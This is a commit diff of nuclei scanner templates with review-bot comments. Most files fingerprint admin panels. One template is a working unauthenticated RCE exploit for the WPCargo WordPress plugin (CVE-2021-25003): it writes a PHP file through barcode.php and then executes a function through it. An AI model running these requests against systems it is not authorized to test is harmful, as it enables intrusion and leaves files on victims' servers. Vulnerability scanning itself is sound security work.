lu4nx 2022-11-04 19:57:21 +08:00
commit 2fd2a176a9
No known key found for this signature in database
GPG Key ID: 5C748E5F36388145
7 changed files with 118 additions and 16 deletions


@ -1,3 +1,4 @@
cves/2021/CVE-2021-25003.yaml
cves/2021/CVE-2021-40661.yaml
cves/2022/CVE-2022-22242.yaml
cves/2022/CVE-2022-38870.yaml
@ -14,6 +15,7 @@ exposed-panels/labkey-server-login.yaml
exposed-panels/nginx-admin-panel.yaml
exposed-panels/nginx-ui-dashboard.yaml
exposed-panels/nport-web-console.yaml
exposed-panels/ourmgmt3-panel.yaml
exposed-panels/xiaomi-wireless-router-login.yaml
exposed-panels/xnat-login.yaml
misconfiguration/ampache-update-exposure.yaml


@ -0,0 +1,51 @@
id: CVE-2021-25003
info:
name: WPCargo < 6.9.0 - Unauthenticated Remote Code Execution
author: theamanrawat
severity: critical
description: |
The WPCargo Track & Trace WordPress plugin before 6.9.0 contains a file which could allow unauthenticated attackers to write a PHP file anywhere on the web server, leading to RCE.
reference:
- https://wpscan.com/vulnerability/5c21ad35-b2fb-4a51-858f-8ffff685de4a
- https://wordpress.org/plugins/wpcargo/
- https://nvd.nist.gov/vuln/detail/CVE-2021-25003
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2021-25003
cwe-id: CWE-434
metadata:
verified: "true"
tags: rce,wpcargo,unauth,cve,cve2021,wordpress,wp,wp-plugin,wpscan
variables:
num: "999999999"
requests:
- raw:
- |
GET /wp-content/plugins/wpcargo/includes/{{randstr}}.php HTTP/1.1
Host: {{Hostname}}
- |
GET /wp-content/plugins/wpcargo/includes/barcode.php?text=x1x1111x1xx1xx111xx11111xx1x111x1x1x1xxx11x1111xx1x11xxxx1xx1xxxxx1x1x1xx1x1x11xx1xxxx1x11xx111xxx1xx1xx1x1x1xxx11x1111xxx1xxx1xx1x111xxx1x1xx1xxx1x1x1xx1x1x11xxx11xx1x11xx111xx1xxx1xx11x1x11x11x1111x1x11111x1x1xxxx&sizefactor=.090909090909&size=1&filepath={{randstr}}.php HTTP/1.1
Host: {{Hostname}}
- |
POST /wp-content/plugins/wpcargo/includes/{{randstr}}.php?1=var_dump HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
2={{md5(num)}}
req-condition: true
matchers:
- type: dsl
dsl:
- "status_code_1 != 200"
- "status_code_2 == 200"
- "status_code_3 == 200"
- "contains(body_3, md5(num))"
- "contains(body_3, 'PNG')"
condition: and
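Review bot: The second raw request writes `{{randstr}}.php` into the plugin's includes directory via the `filepath` parameter of the barcode.php call, and no later request removes it, so a positive result leaves a file on the target that the template never mentions. State that side effect in `description` (the current text describes the CVE, not what the check does) so operators know a cleanup step is needed after a match. `metadata.verified` is the quoted string `"true"` here while the other templates in this commit use the boolean `true`; tooling that filters on the boolean would presumably skip this one, so write `verified: true`. The `description: |` block also keeps a trailing newline in the value; `description: |-` is the usual form in these templates.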


@ -1,32 +1,37 @@
id: fortios-panel
info:
name: FortiOs Exposed Panel
author: canberbamber
name: Fortios Exposed Panel
author: canberbamber,Jna1
severity: info
description: |
admin portal of fortios devices
reference:
- https://www.horizon3.ai/fortinet-iocs-cve-2022-40684/
metadata:
verified: true
shodan-query: http.favicon.hash:945408572
tags: panel,fortinet,fortios
requests:
- method: GET
path:
- "{{BaseURL}}/remote/login?lang=en"
- raw:
- |
GET /api/v2/cmdb/system/admin/admin HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<title>Please Login</title>"
- "Launch FortiClient"
condition: and
- '/remote/login'
- type: word
part: header
words:
- "text/html"
- 'Server: xxxxxxxx-xxxxx'
- type: status
status:
- 200
- 403
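Review bot: The raw request this panel template now sends targets the configuration API (`GET /api/v2/cmdb/system/admin/admin`) rather than the login page, and the status matcher accepts `403`, so the device is fingerprinted by the API's rejection of an unauthenticated call; for a `severity: info` panel check the `/remote/login` page is the less intrusive signal, and an API probe belongs with the CVE-2022-40684 template that the reference already points at. Which of the `200`/`403` and `/remote/login?lang=en`/raw-request lines survive on the new side cannot be read from this rendering, so that pairing is to be confirmed. The product name is `FortiOS`; the rename from `FortiOs` to `Fortios` moves further from it, so `name: FortiOS Exposed Panel` would be better. The `description` (`admin portal of fortios devices`) should say what is actually matched now, since it no longer describes the request being made.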


@ -4,6 +4,9 @@ info:
name: Keycloak Admin Panel
author: incogbyte,righettod
severity: info
metadata:
verified: true
shodan-query: http.favicon.hash:-1105083093
tags: panel,keycloak
requests:
@ -12,13 +15,18 @@ requests:
- "{{BaseURL}}/auth/admin/master/console/"
- "{{BaseURL}}/auth/admin"
stop-at-first-match: true
host-redirects: true
max-redirects: 2
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<a href=\"http://www.keycloak.org\">"
- "keycloak"
part: body
condition: or
- type: status
status:
- 200
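Review bot: With `condition: or` on the body matcher, the bare word `keycloak` alone now satisfies it, and because redirects are followed (`host-redirects: true`, `max-redirects: 2`) any same-host page that merely mentions the product name — documentation, an error page, a custom 404 — will be reported as the admin panel, since the only other matcher is `status: 200`. Keep the `<a href="http://www.keycloak.org">` anchor as the primary signal and replace the generic word with a token only the console markup serves (a title or a console resource path), or drop `condition: or` and require both. `part: body` appears twice in this rendering (old and new position), which is a harmless move but the new block should carry it once. The `metadata` hunk above only adds `verified`/`shodan-query` and needs no change.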


@ -0,0 +1,28 @@
id: ourmgmt3-panel
info:
name: OurMGMT3 Admin Panel
author: ritikchaddha
severity: info
metadata:
verified: true
shodan-query: http.title:"OurMGMT3"
tags: panel,ourmgmt3
requests:
- method: GET
path:
- '{{BaseURL}}'
- '{{BaseURL}}/admin/login'
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'OurMGMT3 Debug client'
- type: status
status:
- 200
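Review bot: `info` has no `description` or `reference`, unlike the other templates touched in this commit, so a reader cannot tell what OurMGMT3 is or why the string `OurMGMT3 Debug client` identifies its admin panel; add a one-line `description` naming the product and a `reference` to the vendor page or wherever the shodan query was taken from. The matcher also keys on body text while the `shodan-query` keys on the `<title>`; if the debug-client string is not present on every build, a second word matching the title with `condition: or` would keep the two fingerprints aligned (to be confirmed against a live instance).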


@ -1,10 +1,11 @@
id: geo-webserver
id: geo-webserver-detect
info:
name: GeoWebServer Detector
author: dhiyaneshDK
author: dhiyaneshDK,daffainfo
severity: info
metadata:
verified: true
shodan-query: http.title:"GeoWebServer"
tags: panel,geowebserver
@ -22,3 +23,10 @@ requests:
- type: word
words:
- "<TITLE>GeoWebServer</TITLE>"
extractors:
- type: regex
part: header
group: 1
regex:
- 'Server: GeoWebServer ([0-9.]+)'
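Review bot: The template lives under `technologies/` and is renamed `geo-webserver-detect`, but `tags` still carries `panel` rather than the `tech` tag the technology-detection templates conventionally use, so tag-based runs of either family will pick it up inconsistently; `tags: tech,geowebserver` would match its location, and the workflow's `tags: geowebserver` subtemplate selection is unaffected. The new regex extractor `Server: GeoWebServer ([0-9.]+)` is a reasonable version capture; adding `name: version` to it would label the extracted value in the output. The request and matcher block this extractor attaches to starts outside the hunk.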


@ -6,6 +6,6 @@ info:
description: A simple workflow that runs all GeoWebServer related nuclei templates on a given target.
workflows:
- template: technologies/geo-webserver.yaml
- template: technologies/geo-webserver-detect.yaml
subtemplates:
- tags: geowebserver
- tags: geowebserver